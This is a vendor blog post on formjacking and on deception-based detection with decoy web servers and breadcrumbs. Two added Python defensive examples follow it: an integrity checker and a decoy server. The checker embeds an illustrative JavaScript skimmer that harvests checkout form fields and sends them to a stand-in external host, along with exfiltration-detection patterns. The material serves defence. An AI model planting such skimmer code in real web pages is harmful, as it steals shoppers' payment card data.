{"id":6452,"date":"2019-03-26T17:22:33","date_gmt":"2019-03-27T00:22:33","guid":{"rendered":"https:\/\/www.acalvio.com\/?p=6452"},"modified":"2019-03-26T17:22:33","modified_gmt":"2019-03-27T00:22:33","slug":"formjacking-deception-is-your-cure","status":"publish","type":"post","link":"https:\/\/acalvio.p2staging.us\/index.php\/2019\/03\/26\/formjacking-deception-is-your-cure\/","title":{"rendered":"Formjacking: Deception is your cure"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">I recently saw a news article published by <\/span><a href=\"https:\/\/investor.symantec.com\/About\/Investors\/press-releases\/press-release-details\/2019\/Cyber-Criminals-Cash-in-on-Millions-With-Formjacking-Posing-a-Serious-Threat-to-Businesses-and-Consumers\/default.aspx\"><span style=\"font-weight: 400;\">Symantec<\/span><\/a><span style=\"font-weight: 400;\"> stating that cyber criminals are shifting their attack techniques. According to Symantec, \u201cFor the first time since 2013, ransomware infections declined, dropping by 20 percent.\u201d With the sharp decline in cryptocurrency prices, attackers are increasingly turning to formjacking attacks, such as Magecart, rather than simply detonating ransomware inside corporate environments and demanding a ransom paid in bitcoin. <\/span><br \/>\n<span style=\"font-weight: 400;\">This is very interesting. As noted in my previous <\/span><a href=\"https:\/\/www.acalvio.com\/using-deception-to-effectively-fight-ransomware\/\"><span style=\"font-weight: 400;\">blog post<\/span><\/a><span style=\"font-weight: 400;\">, Kaspersky drew a similar conclusion. There I discussed how to leverage deception to detect ransomware effectively. In this post, I will discuss how a deception-based detection solution can be used to fight formjacking. <\/span><br \/>\n<span style=\"font-weight: 400;\">Formjacking is a relatively new term in cyber security. 
In Symantec\u2019s definition, \u201cFormjacking attacks are simple \u2013 essentially virtual ATM skimming \u2013 where cyber criminals inject malicious code into retailers\u2019 websites to steal shoppers\u2019 payment card details.\u201d Symantec reports that more than 4,800 unique websites are compromised with formjacking code every month, and that almost one third of the attacks in 2018 happened during the busiest shopping season, November and December. This is absolutely shocking! <\/span><br \/>\n<span style=\"font-weight: 400;\">The worst part about formjacking is that <\/span><b><i>neither the website administrator nor the online shoppers are aware that payment card data is being stolen from the website<\/i><\/b><span style=\"font-weight: 400;\">. Unlike ransomware, which announces itself when encryption starts or the ransom note appears, formjacking hides in the site\u2019s own pages or scripts: the injected code is served by the web server, runs in each shopper\u2019s browser, and quietly copies card details at checkout for months before anybody notices. Once website code is published, it is generally not checked again until the next update is made. In the meantime, the real e-commerce transaction goes through as if nothing had happened, with no business interruption. From the customer\u2019s perspective, they simply continue shopping online and probably do not realize their credit card information has been stolen until days or weeks later. This kind of delayed discovery makes it extremely difficult to trace a compromise back to its source.<\/span><br \/>\n<span style=\"font-weight: 400;\">In my opinion, formjacking is an even more powerful and dangerous attack than ransomware, for the following reasons. <\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It is extremely hard to detect and has a much longer dwell time in corporate environments. 
<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It is becoming increasingly popular and attractive to attackers because of the high yield. (According to the article, with a single stolen credit card fetching up to $45 on underground forums, attackers can earn up to $2.2M a month.)<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It can deeply hurt both the business reputation of the e-commerce website and the customer\u2019s personal identity. <\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">This really puts e-commerce websites and online retailers under pressure. The most recent well-known victims include Ticketmaster and British Airways. Over 380,000 payment cards were stolen in the British Airways incident alone, according to Symantec. <\/span><br \/>\n<span style=\"font-weight: 400;\">If we take a step back and think about the typical attacker workflow, we can see how a deception-based solution is a natural fit. Let me explain how. Most corporate breaches start at a user endpoint, a laptop or workstation, which remains the most exposed component of corporate security. Once attackers compromise an endpoint and establish a beachhead, they start looking for high-value targets inside the victim network. In the formjacking scenario, the targets are the web servers in the data center. From the compromised endpoint, they try to move laterally into the web farm, where they can inject the malicious code. Once they achieve that, it is mission accomplished. (Not every skimmer arrives this way: some are planted in a third-party script the site already loads from another supplier, and that route never crosses the victim\u2019s internal network. The deployment below addresses the in-network route.) <\/span><br \/>\n<span style=\"font-weight: 400;\">Enterprises could deploy deception-based detection at the following two points to catch this activity. <\/span><br \/>\n<span style=\"font-weight: 400;\">First, enterprises could set up a number of fake web servers (called decoys) throughout the web farm. 
An e-commerce website typically consists of multiple web servers, sometimes hundreds or thousands. Even if attackers land on a real web server without being detected, it is in their interest to deploy their malicious code to as many web servers as possible. It is, therefore, very likely that they will eventually touch one of the decoys as they navigate through the web farm, and because no legitimate traffic is ever routed to a decoy, that touch triggers an alert immediately. <\/span><br \/>\n<span style=\"font-weight: 400;\">Second, enterprises could generate breadcrumbs, fake artifacts meant to lead adversaries to decoys, and distribute them across endpoints in the environment. Breadcrumbs can be of various types, including SMB file shares, saved RDP\/SSH sessions and credentials, and so on. These are the typical clues attackers look for in their search for high-value targets, in this case the web servers. If any endpoint is compromised, those breadcrumbs serve as bait leading the attacker to one of the intentionally placed decoys instead of a real web server. Once an attacker connects to the decoy, the deception solution identifies them immediately and various types of response can be initiated.<\/span><br \/>\n<span style=\"font-weight: 400;\">Deception is one of the most effective ways to combat formjacking attacks. It is completely out of band, causes no interruption to regular production traffic, and provides fast and accurate detection. It can significantly reduce attacker dwell time and help e-commerce websites provide secure and safe transactions to their customers. Acalvio ShadowPlex is a leading deception platform that can help you easily set up web decoys and breadcrumbs in your environment, as described above, whether you are hosting on-prem or in the cloud. If you are concerned about formjacking attacks, please contact us for more information! 
<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Formjacking attacks embed JavaScript into ecommerce sites to siphon off credit card data.<\/p>\n","protected":false},"author":2,"featured_media":6453,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[87,97,118],"_links":{"self":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/posts\/6452"}],"collection":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/comments?post=6452"}],"version-history":[{"count":0,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/posts\/6452\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/media\/6453"}],"wp:attachment":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/media?parent=6452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/categories?post=6452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/tags?post=6452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
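The post notes that published site code is generally not re-checked until the next update, and that a skimmer is simply script injected into the retailer's pages. As an added example (my own code, not Acalvio's and not from the original post), here is the re-check a web team can run between deployments: it baselines the web root by SHA-256, and for any file that drifted it flags the two script indicators typical of a skimmer, a script loaded from a host outside an allowlist, or an inline script that both reads form fields and sends data off-site. The allowed hosts, the sample checkout page and the skimmer snippet are constructed for the example; the snippet is illustrative, not a captured sample.

```python
"""Integrity re-check for published web content with skimmer indicators.

Added example, not code from the original post or from Acalvio.  Files are
passed as an in-memory {path: content} dict so the example runs offline;
in practice baseline() runs at deploy time and check_webroot() on a schedule.
"""
import hashlib
import re
from urllib.parse import urlparse

# Hosts the site legitimately loads script from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc=[\"']([^\"']+)[\"']", re.I)
# Inline <script> blocks only: the negative lookahead skips tags that carry src=.
INLINE_SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
# Behaviours that together look like a skimmer: harvest input values, then beacon out.
HARVEST_RE = re.compile(r"querySelectorAll\(\s*[\"'](?:input|form)|\.value\b|new FormData\(", re.I)
EXFIL_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon|new Image)\b|\bsrc\s*=\s*[\"']https?://", re.I)


def sha256(data: str) -> str:
    return hashlib.sha256(data.encode()).hexdigest()


def baseline(files: dict) -> dict:
    """Record one hash per path at deploy time (files: path -> content)."""
    return {path: sha256(content) for path, content in files.items()}


def script_findings(content: str) -> list:
    """Indicators in a page that warrant a human look; empty list means none."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(content):
        host = urlparse(src).hostname          # None for relative URLs, which are skipped
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"external script from unapproved host: {host}")
    for body in INLINE_SCRIPT_RE.findall(content):
        if HARVEST_RE.search(body) and EXFIL_RE.search(body):
            findings.append("inline script reads form fields and sends them off-site")
    return findings


def check_webroot(expected: dict, files: dict) -> dict:
    """Compare the current web root with the baseline.

    Returns {path: [findings]} for every file that is new, changed or missing;
    unchanged files are not reported, so an empty dict means no drift.
    """
    report = {}
    for path, content in files.items():
        if path not in expected:
            report[path] = ["new file not in baseline"] + script_findings(content)
        elif sha256(content) != expected[path]:
            report[path] = ["content changed since baseline"] + script_findings(content)
    for path in expected:
        if path not in files:
            report[path] = ["file missing"]
    return report


# Constructed sample: a clean checkout page as deployed.
CHECKOUT_CLEAN = """<html><body>
<form id="checkout" action="/pay" method="post">
<input name="card_number"><input name="cvv"><button>Pay</button></form>
<script src="https://cdn.shop.example/checkout.js"></script>
</body></html>"""

# Constructed skimmer (illustrative): hooks submit, reads every input, beacons to an
# attacker-controlled host; the real payment request still proceeds untouched.
SKIMMER = """<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var d = {};
  document.querySelectorAll("input").forEach(function (i) { d[i.name] = i.value; });
  fetch("https://stats.collect-example.net/c", {method: "POST", body: JSON.stringify(d)});
});
</script>"""
CHECKOUT_INJECTED = CHECKOUT_CLEAN.replace("</body>", SKIMMER + "\n</body>")


def demo() -> dict:
    """Baseline two pages, then re-check after the checkout page was tampered with."""
    expected = baseline({"checkout.html": CHECKOUT_CLEAN, "index.html": "<html>home</html>"})
    current = {"checkout.html": CHECKOUT_INJECTED, "index.html": "<html>home</html>"}
    return check_webroot(expected, current)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", "; ".join(findings))
```

The hash comparison is the real control: it catches any change, including obfuscated skimmers the regexes would never recognise. The indicator scan only ranks which drifted files to look at first, so an unexplained hash change with no findings still deserves a diff against the deployed artifact.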
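The two deployment points the post describes, decoy web servers placed in the farm and breadcrumbs on endpoints that point at them, as an added runnable sketch in Python (my own code, not Acalvio ShadowPlex and not from the original post). It shows why a decoy hit is high-fidelity: nothing legitimate is ever routed to it, so every request is an alert, and a write attempt (the step a formjacker needs to plant a skimmer) is rated critical. The decoy hostname and address, the alert format and the breadcrumb contents are assumptions for the example.

```python
"""Minimal web-farm decoy plus the breadcrumbs that lead attackers to it.

Added example, not Acalvio's code and not from the original post.  Run it and
the server listens on :8080, printing one JSON alert per request; in a real
deployment those alerts go to the SIEM and the breadcrumb files are dropped
onto user endpoints.
"""
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

DECOY_HOST = "web-07.shop.internal"   # assumed name chosen to blend in with the real farm
DECOY_ADDR = "10.20.30.107"           # assumed address of the decoy

# Methods that change content on a web server; a skimmer has to land through one of
# these (or through a shell over SSH/RDP, which is what the breadcrumbs invite).
WRITE_METHODS = {"PUT", "POST", "PATCH", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
# Paths an attacker probes while looking for a way to edit the site.
ADMIN_HINTS = ("/wp-admin", "/wp-login", "/admin", "/phpmyadmin", "/.git", "/.env",
               "/xmlrpc.php", "/dav")


def classify(method: str, path: str, src_ip: str, user_agent: str = "") -> dict:
    """Turn one decoy hit into an alert dict.

    Every hit is at least 'high' because no production traffic reaches a decoy;
    a write method or an admin/content path makes it 'critical'.
    """
    method = method.upper()
    severity = "high"
    reasons = ["request to decoy web server"]
    if method in WRITE_METHODS:
        severity = "critical"
        reasons.append(f"write attempt via {method}")
    if path.lower().startswith(ADMIN_HINTS):
        severity = "critical"
        reasons.append(f"admin/content path probed: {path}")
    return {"ts": int(time.time()), "decoy": DECOY_HOST, "src_ip": src_ip, "method": method,
            "path": path, "user_agent": user_agent, "severity": severity, "reasons": reasons}


class DecoyHandler(BaseHTTPRequestHandler):
    """Serves a bland storefront page and emits one JSON alert per request."""

    def _handle(self):
        alert = classify(self.command, self.path, self.client_address[0],
                         self.headers.get("User-Agent", ""))
        print(json.dumps(alert), flush=True)      # would be shipped to the SIEM
        body = b"<html><body><h1>Shop</h1><p>Welcome</p></body></html>"
        self.send_response(200)
        self.send_header("Server", "nginx")       # look like the rest of the farm
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    do_GET = do_POST = do_PUT = do_HEAD = do_OPTIONS = _handle

    def log_message(self, *args):                 # keep stdout to JSON alerts only
        pass


def ssh_breadcrumb() -> str:
    """An ~/.ssh/config entry making the decoy look like a routinely used web node."""
    return (f"Host web-07\n    HostName {DECOY_ADDR}\n    User deploy\n"
            f"    IdentityFile ~/.ssh/id_deploy\n")


def rdp_breadcrumb() -> str:
    """A saved .rdp file for the decoy, for Windows admin workstations."""
    return (f"full address:s:{DECOY_ADDR}\nusername:s:CORP\\webadmin\n"
            f"prompt for credentials:i:0\n")


if __name__ == "__main__":
    print(ssh_breadcrumb())
    print(rdp_breadcrumb())
    HTTPServer(("0.0.0.0", 8080), DecoyHandler).serve_forever()
```

The detection logic is deliberately trivial; the fidelity comes from placement. Make the decoy indistinguishable from real nodes (same banner, same naming scheme, present in the same inventory and DNS the attacker will enumerate) and keep it out of load balancers and monitoring probes, or those probes become your false positives.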